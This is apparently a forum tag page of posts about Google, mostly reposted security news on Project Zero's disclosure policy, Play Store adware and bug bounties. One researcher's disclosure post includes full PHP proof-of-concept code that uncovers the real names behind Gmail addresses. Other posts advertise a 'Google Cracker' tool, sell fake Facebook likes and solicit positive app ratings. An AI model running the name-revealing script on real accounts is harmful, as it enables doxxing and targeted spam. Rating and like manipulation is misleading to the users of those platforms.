Showing results for tags 'google'.

  1. Highly aggressive adware has been found hidden in ten Android applications hosted on Google Play, Bitdefender reported. Adware is highly common on both desktop PCs and smartphones. However, the threats discovered by the security firm stand out not just because they are aggressive, but also because they employ clever tricks to stay hidden on the infected device. Once installed, the apps redirect victims to a webpage, hosted at mobilsitelerim.com/anasayfa, which serves ads designed to trick users into installing other pieces of adware disguised as system or performance updates, or get them to sign up for premium services. The displayed ads differ depending on the user’s location, Bitdefender said. “Although they’re not malicious per se, by broadcasting sensitive user information to third parties, they resemble aggressive adware found on desktop PCs. The resulting barrage of pop-ups, redirects and ads irks users and seriously damages both the user experience and the performance of Android devices,” Bitdefender security researcher Liviu Arsene explained in a blog post. After the adware (Android.Trojan.HiddenApp.E) is installed on the device, the redirections occur whenever the victim tries to access a website via the stock Android browser, Chrome, Firefox, and even Facebook. “After the apps are installed, the redirects occur as soon as you open any of the mentioned browsers. Regardless of what URL you’re trying to visit, you’re redirected to ad-displaying websites. The next redirect is performed after 60 seconds have elapsed,” Arsene told SecurityWeek via email. The applications had been uploaded to Google Play with names such as “What is my ip.” Researchers found the apps under two developer accounts, but the same individual might be behind both of them. In order to avoid raising suspicion, the applications only require two permissions on installation (Network Communication and System Tools).
While users might figure out which of the apps they installed cause the annoying redirections, removing them could prove difficult. That’s because the applications are installed with the name “System Manager,” instead of the one used to advertise them on Google Play. The search giant appears to have removed most of the apps from Google Play after being alerted by Bitdefender, but some of the shady programs can still be found on third-party app markets. Experts believe the adware made it past Google’s vetting process because the URL that is used to redirect users doesn’t actually serve any malicious APKs. Source: securityweek.com
  2. It's built on the Blogger platform, simple, no ads; I hope I manage to get it onto the first page of Google, and then the customers will come too. Opinions? Advice? Sell Cheap Facebook Likes and Votes
  3. Google on Thursday unleashed its own free web application vulnerability scanner tool, which the search engine giant calls Google Cloud Security Scanner, that will potentially scan developers' applications for common security vulnerabilities on its cloud platform more effectively.

     SCANNER ADDRESSES TWO MAJOR WEB VULNERABILITIES

     Google launched the Google Cloud Security Scanner in beta. The new web application vulnerability scanner allows App Engine developers to regularly scan their applications for two common web application vulnerabilities:

       • Cross-Site Scripting (XSS)
       • Mixed Content Scripts

     Although several free web application vulnerability scanner and vulnerability assessment tools are available in the market, Google says these website vulnerability scanners are typically hard to set up and "built for security professionals," not for web application developers that run the apps on the Google App Engine, while Google Cloud Security Scanner will be easier for web application developers to use. This web application vulnerability scanner easily scans for Cross-Site Scripting (XSS) and mixed content scripts flaws, which the company argues are the most common security vulnerabilities Google App Engine developers face. Today, common HTML5 and JavaScript-heavy applications are more challenging to crawl and test, and Google Cloud Security Scanner claims to take a novel approach by parsing the code and then executing a full-page render to find more complex areas of a developer's site.

     GO FOR WEB VULNERABILITY SCAN NOW

     Developers can access the Cloud Security Scanner under Compute > App Engine > Security in Google's Developers Console. This will run your first scan. It does not work with App Engine Managed VMs, Google Compute Engine, or other resources.

     Google notes that there are two typical approaches to such security scans:

       • Parse the HTML and emulate a browser – This is fast; however, it comes at the cost of missing site actions that require a full DOM or complex JavaScript operations.
       • Use a real browser – This approach avoids the parser coverage gap and most closely simulates the site experience. However, it can be slow due to event firing, dynamic execution, and time needed for the DOM to settle.

     Security Engineering head Rob Mann says that their web vulnerability scanner uses Google Compute Engine to dynamically create a botnet of hundreds of virtual Chrome workers that scan at a max rate of 20 requests per second, so that the target sites won’t be overloaded. The search engine giant still recommended developers to look into manual security review by a web app security professional, just to be on the safer side. However, the company hopes its vulnerability scanner tool will definitely provide a simple solution to the most common App Engine issues with minimal false positives.

     Source
  4. Google has adjusted the terms of its controversial Project Zero vulnerability scouting effort, loosening its 90-day disclosure policy somewhat to give companies a better chance of fixing their security bugs before they become public knowledge. Among the changes, Google says it will no longer disclose bugs on weekends and public holidays, and it will even offer software vendors a brief grace period to finish their patches, if they request one. Project Zero has drawn fire from software companies – most notably Microsoft – for disclosing critical vulnerabilities to the public exactly 90 days after it reports them to vendors, a policy that top Redmond security bod Chris Betz said "feels less like principles and more like a 'gotcha'." "What's right for Google is not always right for customers," Betz wrote in a blog post in January. "We urge Google to make protection of customers our collective primary goal." Mind you, it's only natural that Microsoft would be miffed. Among the bugs revealed by Project Zero so far are critical zero-day flaws in Windows that can potentially allow an attacker to gain full control of affected systems. Google's vulnerability disclosures often include proof-of-concept exploit code, meaning cyber-crooks have access to working exploits the minute Google's disclosure goes live. Still, Google seems to have heard Redmond's complaints. On Friday, the online ad-slinger said it would make changes to how Project Zero discloses flaws, but it stopped short of saying it would lengthen the 90-day deadline, noting that CERT's own deadline is even shorter. "We notify vendors of vulnerabilities immediately, with details shared in public with the defensive community after 90 days, or sooner if the vendor releases a fix," Google's security team wrote in a blog post. "We've chosen a middle-of-the-road deadline timeline and feel it's reasonably calibrated for the current state of the industry." Going forward, however, 90 days won't necessarily mean 90 days. 
For one thing, if the date of a patch disclosure deadline falls on a weekend or a public holiday, Google now says it will hold off on its disclosure until the next working day. What's more, the Chocolate Factory says it will extend the disclosure deadline by a grace period of up to 14 days, provided a vendor lets it know that a patch will be released on a specific date within the 14 days. "Public disclosure of an unpatched issue now only occurs if a deadline will be significantly missed," Google's post states. Google says it will also be sure to pre-assign CVE (Common Vulnerabilities and Exposure) numbers to bugs that go past their deadlines before it discloses them, to avoid confusion and help the public understand specific threats. But Redmond wasn't entirely satisfied with the changes, saying it would much rather see Google work more interactively with software vendors to apply patches. "When finders release proof-of-concept exploit code, or other information publicly before a solution is in place, the risk of attacks against customers goes up," Microsoft's Betz told The Register in an emailed statement. "While it is positive to see aspects of disclosure practices adjust, we disagree with arbitrary deadlines because each security issue is unique and end-to-end update development and testing time varies." Google, meanwhile, said that an arbitrary deadline, albeit a nondiscriminatory one, is the best vendors can hope for. "As always, we reserve the right to bring deadlines forwards or backwards based on extreme circumstances," Google's security team said. "We remain committed to treating all vendors strictly equally." ® Source
  5. Red Hat Enterprise Linux customers can now shift their licenses from on-premise gear up into Google's cloud as well as Amazon's. The new licensing option was announced by Google and Red Hat on Monday alongside the general availability of Red Hat Enterprise Linux on Google's Amazon-killing "Cloud Platform". RHEL had been available in a "preview" mode since Compute Engine went into general availability in December 2013. With the news, RHEL will be available to customers in both an on-demand consumption model and via a "Red Hat Cloud Access" option which lets companies "migrate their current [RHEL] subscriptions for use on Google Cloud Platform." To give punters this option, Google has joined the "Red Hat Certified Cloud Provider Program", which means the company has met the "testing and certification requirements to demonstrate that they can deliver a safe, scalable, supported and consistent environment for enterprise cloud deployments," Red Hat wrote in a release. The RHEL software served up on Google's cloud platform differs from typical installations, Google explains, by incorporating Google's Compute Engine tools gcutil, gsutil, and gcimagebundle, enabling SELinux by default, allowing inbound SSH access through the RHEL firewall, augmenting rsyslog, and other tweaks. RHEL cloud servers cost extra. Google charges $0.06 per hour for the RHEL software on servers of less than eight virtual cores and $0.13 per hour on servers with more, along with the base server fee. Until today it was only possible for punters to shift their on-premise licenses up into cloud king Amazon Web Services. The new choice of suppliers is likely to be welcomed, especially since Amazon and Google are locked in a price war with each other. ® Source
  6. Google’s unwavering vulnerability disclosure deadlines are the latest chapter in a decades-long debate about how to best inform affected users that there’s a security problem with their software. Since the start of the year, Google’s 90-day clock has most notably ticked down to zero on a trio of flaws in Microsoft products and two others in Apple’s OS X. And upon doing so, Google’s researchers shared with the world technical details and proof of concept code for each vulnerability. Proponents of Google’s policy will argue that 90 days is plenty of time for a vendor to address a “responsibly” disclosed vulnerability. Opponents argue that a zero day is a zero day, and in such cases, a greater cut of attackers has vital information for exploit building when the details are public. Google, being the giant that it is, threw more gasoline on the controversial fire when, with one of the Microsoft flaws, it refused to sit on the details reportedly for two more days until Microsoft said it would be ready with a patch. Today, Google announced several adjustments to its disclosure policy, one of them being a 14-day grace period afforded to vendors that inform Google before the expiration of the 90-day deadline that a patch is scheduled for release within the 14-day extension. “Public disclosure of an unpatched issue now only occurs if a deadline will be significantly missed (2 weeks+),” the Project Zero team said in its announcement. “As always, we reserve the right to bring deadlines forwards or backwards based on extreme circumstances. We remain committed to treating all vendors strictly equally,” the researchers wrote. 
“Google expects to be held to the same standard; in fact, Project Zero has bugs in the pipeline for Google products (Chrome and Android) and these are subject to the same deadline policy.” Google also announced that the first public mention of a vulnerability needs to include a CVE identifier and that Google will obtain a pre-assigned one for vulnerabilities that go past deadline. It also said that if a 90-day deadline expires on a weekend or a U.S. public holiday, the deadline will be extended to the next working day. “Putting everything together, we believe the policy updates are still strongly in line with our desire to improve industry response times to security bugs, but will result in softer landings for bugs marginally over deadline,” Google said. “Finally, we’d like to call on all researchers to adopt disclosure deadlines in some form, and feel free to use our policy verbatim if you find our data and reasoning compelling.” This should make some major vendors breathe a little easier. Microsoft, for its part, said that it disagrees with arbitrary deadlines because of the uniqueness of vulnerabilities and variables introduced during patch development and testing time. “We prioritize security updates based on the probability and impact to customers,” said Chris Betz, head of the Microsoft Security Response Center. “When finders publicly disclose vulnerability information with exploit details, they are increasing the potential for attack for millions of customers.” Google isn’t the only major technology company with a disclosure deadline. HP’s Zero Day Initiative, one of the first vulnerability programs, has a 120-day deadline, while CERT at the Software Engineering Institute at Carnegie Mellon University, a DHS-sponsored organization, has a 45-day deadline. Deadlines ensure that vendors don’t sit on vulnerabilities for months, or years in some cases.
“The idea of disclosure deadlines is an old one and in practice in a lot of organizations,” said Katie Moussouris, chief policy officer at HackerOne. “The idea behind it is that people are protected and risk is minimized by limiting the window of exposure caused by an unpatched vulnerability.” Google, meanwhile, made its case that its disclosure policies are working, with vulnerabilities patched consistently and quicker by most of the affected vendors. It says, for example, that Adobe has patched 37 vulnerabilities reported by Google inside of the 90-day deadline; 154 Project Zero vulnerabilities overall (85 percent) were fixed inside of 90 days. Source
  7. Using a combination of vulnerabilities in the Google Play store and the Android stock browser, attackers can install malicious apps remotely on some Android devices. The attack is the result of a failure on the part of Google’s Play Store Web application to completely enforce the X-Frame-Options header, a common defense against clickjacking and other attacks. Researchers at Rapid7 discovered that combining that weakness with an XSS flaw in another area of the Play Store, or a universal XSS in some Android browsers can allow an attacker to install and launch apps. Developers at the Metasploit Project have added a module to the Metasploit Framework that can exploit these vulnerabilities on some Android devices. “This module combines two vulnerabilities to achieve remote code execution on affected Android devices. First, the module exploits CVE-2014-6041, a Universal Cross-Site Scripting (UXSS) vulnerability present in versions of Android’s open source stock browser (the AOSP Browser) prior to 4.4. Second, the Google Play store’s web interface fails to enforce a X-Frame-Options: DENY header (XFO) on some error pages, and therefore, can be targeted for script injection,” the documentation from Metasploit says. “As a result, this leads to remote code execution through Google Play’s remote installation feature, as any application available on the Google Play store can be installed and launched on the user’s device.” Tod Beardsley of Rapid7 said in a blog post about the attack that users on vulnerable platforms who are always logged in to common Google services are especially at risk. “Of the vulnerable population, it is expected that many users are habitually signed into Google services, such as Gmail or YouTube. These mobile platforms are the ones most at risk. Other browsers may also be affected,” he said. The module to exploit this attack is in Metasploit now, a circumstance that often is a precursor to a wave of attacks on a targeted vulnerability. Source
  8. We all know about Google Drive, the cloud storage and file backup service offered by Google. Everyone can get free 15 GB cloud storage on Google Drive at any time: just signup for a Google account (or login to your existing Google account), head over to the Google Drive page, and boom — you have your free 15 GB that never expires. For a limited time, however, you can get an additional (extra) 2 GB for your Google Drive account for life. Yes, that means you will have 17 GB on Google Drive that won’t ever expire. Get it now. Sale ends in 2 days 18 hrs 36 mins Link: Free lifetime 17 GB Google Drive cloud storage (100% discount)
  9. Google is offering grants worth up to $3,000 to investigate suspected security flaws as a part of a new "experimental" initiative. Google security engineer Eduardo Vela Nava announced the move in a blog post, promising to offer further incentives for researchers to investigate suspected problems that they would otherwise ignore. "Today we're rolling out a new, experimental programme: Vulnerability Research Grants. These are upfront awards that we will provide to researchers before they ever submit a bug," he explained. "We'll publish different types of vulnerabilities, products and services for which we want to support research beyond our normal vulnerability rewards. "We'll award grants immediately before research begins, with no strings attached. Researchers then pursue the research they applied for, as usual. There will be various tiers of grants, with a maximum of $3,133.70." Google also announced plans to expand its existing bug bounty programme to include flaws in mobile applications. "Also starting today, all mobile applications officially developed by Google on Google Play and iTunes will now be within the scope of the Vulnerability Reward Programme," read the post. Google has been a constant supporter of bug bounty schemes, and announced reforms to its programmes in 2014. Google tripled Chrome bug bounty payments to $15,000 in October prior to launching the Project Zero initiative. Project Zero was launched in July 2014 with the apparent intention of speeding up companies' patch release schedules. The team of researchers does this by initially disclosing flaws privately to the firms responsible and giving them 90 days to release a fix before making the research public. The project was criticised earlier this year for the public disclosure of bugs in Microsoft's Windows and Apple's Mac OS X operating systems. Nava credited the schemes as a success despite the controversy. 
He revealed that Google paid researchers more than $1.5m for discovering over 500 bugs last year. Source
  10. I want to know whether articles written with this kind of program from the internet rank in Google, or is writing by hand still better?
  11. Guest

    .com domain

    On google .com & .ro it appears on the first page, while on google.es it appears on the second page.
  12. Google won't accept me on AdSense no matter what. I'm trying to put AdSense on my YouTube account... can anyone help me?
  13. Update: OK Apple, your turn. After raising a ruckus with the disclosure of three unpatched Windows vulnerabilities, Google’s Project Zero research team did the same this week with a trio of security issues in Apple OS X. Project Zero imposes a 90-day deadline on vulnerabilities it reports to affected vendors; if a patch is not delivered inside that time frame, details are automatically made public via its external database. The respective OS X bugs were reported to Apple in late October and 90-day deadlines began expiring this week. The Project Zero disclosures also come with proof-of-concept exploit code. A request for comment from Apple was not returned in time for publication. Published reports indicate that the vulnerabilities have been patched in Yosemite 10.10.2, which is in beta. The vulnerabilities affect different components of Apple’s flagship operating system, and range from memory corruption, kernel code execution and a sandbox escape. All three require some kind of local access to exploit. The sandbox escape vulnerability, OS X networkd “effective_audit_token” XPC type confusion sandbox escape as labeled by Google, may have been mitigated starting in the Yosemite version of OS X. Google refers to a separate advisory for those details. In its disclosure on Tuesday, Google said that the networkd system daemon implements an XPC service API which communicates on behalf of an application. Project Zero said that XPC messages using get parameters are used without checking the type of returned value. This allows messages to reach functions outside the sandbox, Google said. One day later, the 90-day deadline expired on an OS X IOKit kernel execution vulnerability. “Calling IOConnectMapMemory on userclient type 2 of “IntelAccelerator” with memory type 3 hits an exploitable kernel NULL pointer dereference calling a virtual function on an object at 0x0,” Google said in its advisory. 
Part of this disclosure originally included a kernel ASLR bypass, but that was patched in Yosemite 10.10, Google said. The third disclosure happened yesterday and is another OS X IOKit kernel memory corruption vulnerability. Google said a Bluetooth device must be connected to exploit this bug, which is due to a bad bzero in IOBluetoothDevice. “Userspace can modify the size in shared memory leading to the bzero writing a controlled number of NULL bytes off the end of the buffer,” the advisory said. Project Zero’s automated disclosures are the latest salvo in the industry’s eternal debate over the sharing and distribution of vulnerability details. Microsoft fought back after Google spilled the beans on a trio of its unpatched bugs, one of which Google refused to sit on for an additional two days before Microsoft was to release a patch. Source
  14. Google Cracker V1 By No Network Organization Based On Facebook Cracker V2 By Mauritania Attacker Scan Link: FuckingScan Download: https://drive.google.com/file/d/0By7jLp_VXjqHaUItUVBUOXNnOGs/view
  15. Hello, the great hacker shelo has run out of jokes, or has Google been blocked for suckers, because he is making a fool of himself on Messenger. At least teach him to stop looking for jokes on Google and to look for them on redtube
  16. Good evening, I have just published a game on Google Play. I need your support, specifically for you to leave me a positive rating, and possibly a comment, on the Google Play page. Those who are willing and want to help me with this are asked to send me a PM. I am taking this opportunity to announce that I need an Android developer with some experience so we can develop the application further. In the next version I also want to add a Multiplayer mode and a few less complicated features, such as double bet. Note that I am willing to share any eventual earnings with the developer. I will handle the design and promotion of the application myself. PM if anyone is interested!
  17. A critical cross-site scripting (XSS) vulnerability in the Google Apps administrator console allowed cyber criminals to force a Google Apps admin to execute just about any request on the https://admin.google.com/ domain. The Google Apps admin console allows administrators to manage their organization’s account. Administrators can use the console to add new users, configure permissions, manage security settings and enable Google services for your domain. The feature is primarily used by many businesses, especially those using Gmail as the e-mail service for their domain.

      The XSS flaw allowed attackers to force the admin to do the following actions:

        • Creating new users with "super admin" rights
        • Disabling two-factor authentication (2FA) and other security measures from existing accounts or from multiple domains
        • Modifying domain settings so that all incoming e-mails are redirected to addresses controlled by the attacker
        • Hijack an account/email by resetting the password, disabling 2FA, and also removing login challenges temporarily for 10 minutes

      This new zero-day vulnerability was discovered and privately reported by application security engineer Brett Buerhaus to Google on September 1 and the company fixed the flaw within 17 days. In exchange for the report, Google paid the researcher $5,000 as a reward under its bug bounty program.

      According to the researcher, when users access a service that hasn’t been configured for their domain, they are presented with a "ServiceNotAllowed" page. This page allows users to switch between accounts in order to log in to the service. However, when one of the accounts was selected, a piece of JavaScript code was executed in an attempt to redirect the user’s Web browser. JavaScript code could be supplied by the user in the "continue" request parameter of the URL, which allowed XSS attacks.

      Patching the vulnerability on the 17th day after it was reported to the company shows the search engine giant’s concern to secure its software and users as well. However, the recent vulnerability troubles visited Microsoft exposed one-after-one three serious zero-day vulnerabilities in Windows 7 and 8.1 operating systems, reported by Google’s Project Zero team. Microsoft wasn't able to fix the security flaws in its software even after a three-month-long time period provided to the company.

      Source
  18. overview

      on 12/09/14 i discovered a method of revealing the full and/or display names associated with gmail accounts via maps engine, whether or not those accounts are associated with google plus, which renders said information public. i immediately submitted my findings to google’s vulnerability rewards program and began correspondence with their security team. at some point during this time, i discovered a nearly identical vulnerability in google drive, and held it as an ace up my sleeve while awaiting feedback on the maps engine leak. the google drive leak differs in a few ways from the maps engine leak, specifically in that it doesn’t deploy an email to the target – potentially informing him or her that something is afoot, and is what the live proof of concept and open source code are based upon. here it is in action with a non-g+ account:

      <11:35 pm est update>
      it has recently come to light that this not only works on google accounts, but *some* hotmails, yahoos and others as well. here’s a small excerpt of what i just sent over to google’s security team: additionally, adrian suggested the possibility of: so thanks to him and marcus from the 2600 group for helping me try to wrap my head around this, and this tweet, which poses an excellent question: as well as for providing some suggested reading material for the guys on google’s security team:
      </11:35 pm est update>

      timeline of events

        • 12/09/14: submitted vulnerability report
        • 12/15/14: confirmation that the issue exists
        • 12/16/14: google employee confirms that maps engine is “too chatty” and files a bug report
        • 01/17/15: i am informed the issue “doesn’t represent a security vulnerability”
        • 01/20/15: google publicly announces its plans to deactivate maps engine and restricts new signups
        • 01/20/15: it is discovered that other email services, not just gmail, are vulnerable. google security team notified via email

      click here for a live poc demo of the gmail full name revealer

      now obviously you aren’t going to reveal a target’s full name every time. there are a few factors to consider; one of which being that not everyone uses their actual full name when signing up for something on the internet, another being that gmail accounts must be 6 characters long, and i’m sure a few others i’m not accounting for. sometimes you’ll retrieve null results, but most of the time what you’ll end up with is either a user-set display name, or in most cases, the first and last name the target entered while signing up for the account as seen here:

      and here’s the source code. you may quickly notice php isn’t my native programming language, so feel free to make revisions. i’d love to see them.

          <?php
          $targetEmail = 'target@gmail.com';

          require_once "google-api-php-client/src/Google/Client.php";
          require_once "google-api-php-client/src/Google/Service/Drive.php";
          require_once "google-api-php-client/src/Google/Auth/AssertionCredentials.php";

          $cScope = 'https://www.googleapis.com/auth/drive';
          $cClientID = '[clientid]';
          $cClientSecret = '[clientsecret]';
          $cRedirectURI = '[redirecturi]';

          $cAuthCode = '';
          if (isset($_GET['code'])) {
              $cAuthCode = $_GET['code'];
          }

          if (!($cAuthCode) == "null") {
              // no authorization code yet: send the browser to the oauth consent page
              $rsParams = array(
                  'scope' => $cScope,
                  'state' => 'security_token',
                  'redirect_uri' => $cRedirectURI,
                  'response_type' => 'code',
                  'client_id' => $cClientID,
                  'access_type' => 'offline',
                  'approval_prompt' => 'force'
              );
              $cOauthURL = 'https://accounts.google.com/o/oauth2/auth?' . http_build_query($rsParams);
              header('Location: ' . $cOauthURL);
              exit();
          } elseif (empty($cRefreshToken)) {
              // exchange the authorization code for an access token
              $authURL = "https://www.googleapis.com/oauth2/v3/token?code=" . $cAuthCode . "&client_id=" . $cClientID . "&client_secret=" . $cClientSecret . "&redirect_uri=" . $cRedirectURI . "&grant_type=authorization_code";
              $ch = curl_init();
              curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
              curl_setopt($ch, CURLOPT_URL, $authURL);
              curl_setopt($ch, CURLOPT_POST, true);
              curl_setopt($ch, CURLOPT_POSTFIELDS, "");
              curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
              $output = curl_exec($ch);
              curl_close($ch);
              $oToken = json_decode($output);
              $accessToken = $oToken->access_token;
              $refreshToken = $oToken->refresh_token;
          }

          // create a file in the caller's own drive
          $createURL = "https://www.googleapis.com/drive/v2/files";
          $ch = curl_init();
          curl_setopt($ch, CURLOPT_HTTPHEADER, array(
              'Content-Type: application/json',
              "Authorization: Bearer " . $accessToken
          ));
          curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'POST');
          curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
          curl_setopt($ch, CURLOPT_URL, $createURL);
          curl_setopt($ch, CURLOPT_POST, true);
          curl_setopt($ch, CURLOPT_POSTFIELDS, "{\"title\": \"revealyourself1\"}");
          curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
          $output = curl_exec($ch);
          curl_close($ch);
          $oToken = json_decode($output);
          $fileID = $oToken->id;

          // add the target address as a permission on that file, without a notification email
          $compileJSON = array("role" => "writer","type" => "user","value" => $targetEmail,"emailAddress" => $targetEmail);
          $jsonPostData = json_encode($compileJSON);
          $addUser = "https://www.googleapis.com/drive/v2/files/" . $fileID . "/permissions?sendNotificationEmails=false";
          $ch = curl_init();
          curl_setopt($ch, CURLOPT_HTTPHEADER, array(
              'Content-Type: application/json',
              "Authorization: Bearer " . $accessToken
          ));
          curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'POST');
          curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
          curl_setopt($ch, CURLOPT_URL, $addUser);
          curl_setopt($ch, CURLOPT_POST, true);
          curl_setopt($ch, CURLOPT_POSTFIELDS, $jsonPostData);
          curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
          $output = curl_exec($ch);
          curl_close($ch);

          // the permission response carries the account's name field
          if (strpos($output,'error') !== false) {
              echo 'error feedback from google:<br><br>' . $output;
          } else {
              $oToken = json_decode($output);
              $fullName = $oToken->name;
              echo $targetEmail . ' is ' . $fullName;
          }
          ?>

      reflection

      this clearly isn’t, by any stretch of the imagination, the hack of the century. however, i do think that the significance of this issue, as well as my efforts to correct it, were marginalized by google. i believe many users signing up for a simple webmail account aren’t comfortable with their full names being readily accessible to the public, and ultimately my goal here is to see google make a more concentrated effort to protect their users’ privacy. i would like to see these two security vulnerabilities patched before troublemakers start running wild d0xing each other and spammers utilize them to compile name,email .csv data for highly targeted unsolicited email campaigns. i also think that these are two instances of information leaks, which google’s vulnerability rewards program classifies as being valued at $5,000 to $10,000 a pop, and i classify as information leaks based on google’s privacy policy’s indication of their users’ names being “personal information.” in any case, i won’t be working with google’s security team in the future unless they, at least in this particular instance, reevaluate what constitutes a security vulnerability. stay tuned for updates.

      Source: http://mcsheehan.com/?p=15
  19. I've found this video, and it is very useful for all of us who don't know about startpage secure engine, the best alternative to google:
  20. Microsoft has heavily criticized Google and its 90-day security disclosure policy after the firm publicly revealed two zero-day vulnerabilities in Microsoft’s Windows 8.1 operating system, one after another, just days before Microsoft planned to issue a patch to kill the bugs. But seemingly Google doesn't give a damn. Once again, Google has publicly disclosed a new serious vulnerability in Windows 7 and Windows 8.1 before Microsoft has been able to produce a patch, leaving users of both operating systems exposed to hackers until next month, when the company plans to deliver a fix. DISCLOSURE OF UNPATCHED BUGS, GOOD OR BAD? Google’s tight 90-day disclosure policy seems to be a good move for pushing all software vendors to patch their products before they get exploited by hackers and cybercriminals. But at the same time, disclosing all critical bugs along with their technical details in a widely used operating system like Windows 7 and 8 doesn’t appear to be the right decision either. In both cases, the only ones to suffer are the innocent users. The revelation of the security flaw was also a part of Google's Project Zero, an initiative that identifies security holes in different software and calls on companies to publicly disclose and patch bugs within 90 days of discovering them. This time the search engine giant has discovered a flaw in the CryptProtectMemory memory-encrypting function found within Windows 7 and 8.1 and present in both 32- and 64-bit architectures, which can accidentally disclose sensitive information or allow a miscreant to bypass security checks, apparently. MICROSOFT WILL DELIVER PATCH IN FEB, 2015 Google first notified Microsoft of the vulnerability in Windows 7 and 8.1 on October 17, 2014. Microsoft then confirmed the security issues on October 29 and said that its developers managed to reproduce the security hole. The patch for the vulnerability is scheduled for Feb. 10, next Patch Tuesday. 
The vulnerability was found by James Forshaw, who also discovered a "privilege elevation flaw" in Windows 8.1, which was disclosed earlier this week and drew strong criticism from Microsoft. The newly discovered bug actually resides in the CNG.sys implementation, which failed to run proper token checks. This is the third time in less than a month that Google’s Project Zero has released details of a vulnerability in Microsoft’s operating system, following its 90-day public disclosure deadline policy. A few days ago, Google released details of a new privilege escalation bug in Microsoft's Windows 8.1 operating system just two days before Microsoft planned to patch the bug. Google vs. Microsoft — Google reveals Third unpatched Zero-Day Vulnerability in Windows - Hacker News
  21. I figured I'd post this news here since it's not really security-related.... By EJ Dickson on September 15, 2014 This article contains sexually explicit material that may be NSFW. Everyone has a favorite search engine for finding porn. But it’s a well-established fact that thanks to certain tech juggernauts imposing restrictions on adult content in search results, some search engines are just better at finding smut than others (*cough Bing cough*). If you have an ultra-high-powered government job, or you share a computer with a roommate who’s studying for the clergy, there’s always a concern that your late-night searches for busty Brazilian teens will show up in your search history. But apparently, you won’t have to worry about that happening with Boodigo, which is being touted as “the world’s first adult search engine.” Unlike other search engines, which make it intentionally difficult for users to access naughtier content, Boodigo “is designed to find ‘real’ adult sites and give top listings to them,” Colin Rowntree, one of Boodigo’s founders, said in a press release. “That avoids the problem of going to Google, searching for, say, ‘blowjob’, and getting the first multiple results pages of Wikipedia articles, women’s magazine how-to guides, etc., before the online user can actually find a link to sites that focus on blowjob photos and movies.” Boodigo isn’t actually the first search engine designed exclusively for porn: There’s also Search.xxx, an adult-friendly mockup of Google, as well as PornMD. But unlike PornMD, which will take you directly to free tube sites (which many performers in the adult industry have claimed encourages the spread of illegal piracy), Boodigo is marketing itself as a search engine for the ethical porn aficionado: The site directs you to individual performer and studio pay sites, instead of sites that might feature illegally posted or unlicensed content. 
Curious about the potential of a porn search engine that encourages people to actually pay for porn, I decided to give Boodigo a whirl. I started with an easy one: adult performer and Duke porn star Belle Knox, whom I met at her birthday party earlier this year. Here’s what came up when I searched for Knox on Google, sans SafeSearch settings: And here’s Knox on Boodigo: These search results either link to Belle’s entries on various porn databases, or to pay sites that feature her work, where you have to again search for her there. (Not all of them even do: Baremaidens.com, for instance, which shows up in a Boodigo search, features performers named “Bailey Knox” and “Natasha Belle,” but not the Duke porn star herself.) Next, I tried “eel anal porn,” based on an unnamed coworker’s suggestion that a film called Eels Out the Ass Like Whoa is a real thing. When I searched on Google, the clip immediately came up in the second search result, for better or for worse: Sadly, that was not the case on Boodigo. Apparently, the site had some trouble differentiating between the specific niche I was searching for (i.e. eel anal porn), and good old-fashioned anal porn, which in the world of porn searches is kind of like being unable to tell the difference between a Burgundy and a Bordeaux and just saying, "meh, they're both red wines." Boodigo also pulled up a performer named “Anal Alan,” whom I had never heard of but apparently has an empty YouTube channel. (Given that his height is listed as “0,” I guess it’s no surprise that his career never took off.) Because “eel anal porn” is admittedly fairly obscure, I decided to search for just “anal.” My luck was a little better with Boodigo this time around: Not so much with Google, however, which pulled up Wikipedia and the r/anal subreddit in lieu of actual anal porn: That's like asking for a glass of Bordeaux and getting a warm can of 7-Up instead. Shame on you, Google. Shame. On. You. 
So, OK, if it wants to go around calling itself the world’s first porn search engine, Boodigo obviously needs to work out a few kinks first. But in light of Google’s recent AdWords policy change restricting adult content advertising, many porn performers and producers have expressed concern that tech giants are increasingly censoring adult content, which might lead to them eliminating adult content from their platforms altogether. If that actually ever happens, a search engine like Boodigo won’t just be helpful to porn aficionados looking for a secure, anonymous, cookie-free J.O. experience—it’ll be necessary. Let’s just hope for the sake of eel anal enthusiasts that it tweaks its algorithms a bit first. Photo via morgueFile Archive (PD) Source: Can the 'world's first porn search engine' beat Google?
  22. PARIS - France's data protection watchdog on Wednesday fined Google 150,000 euros ($205,000) -- the maximum possible -- for failing to comply with its privacy guidelines for personal data. The watchdog, the CNIL, also ordered the US Internet giant to publish a statement relating to its decision on its French homepage for at least 48 hours within the next eight days. Google was informed of the decision on January 3, the CNIL said in a statement. France's move follows Google's introduction in 2012 of a new privacy policy which enables it to track user activity across its search engine, Gmail, the Google+ social networking platform and other services it owns, which include YouTube. The changes make it easier for Google to collect and process data that could be used by advertisers to target individuals with tailored offers, thereby increasing the company's revenue potential. The CNIL had asked Google to inform web users in France on how it processes their personal data and to define exactly how long they can store the information. It had also requested that the US giant obtain user permission before storing cookies on their computers, referring to files that track web surfers and allow companies to target them with tailored commercials. Google has always maintained that its treatment of data gathered from users is in line with European law and has previously refused to get into an argument about the specific French requirements. The issue of data protection has gathered steam worldwide following revelations by Edward Snowden, a former contractor with the National Security Agency, that the US had a vast, secret program called PRISM to monitor Internet users. Google has defended the changes it made last year on the ground that they simplify and standardize its approach across its various services. 
But critics argue that the policy, which offers no ability to opt out aside from refraining from signing into Google services, gives the operator of the world's largest search engine unprecedented ability to monitor its users' tastes and purchasing patterns. Source: France Fines Google Maximum Penalty in Data Privacy Row | SecurityWeek.Com
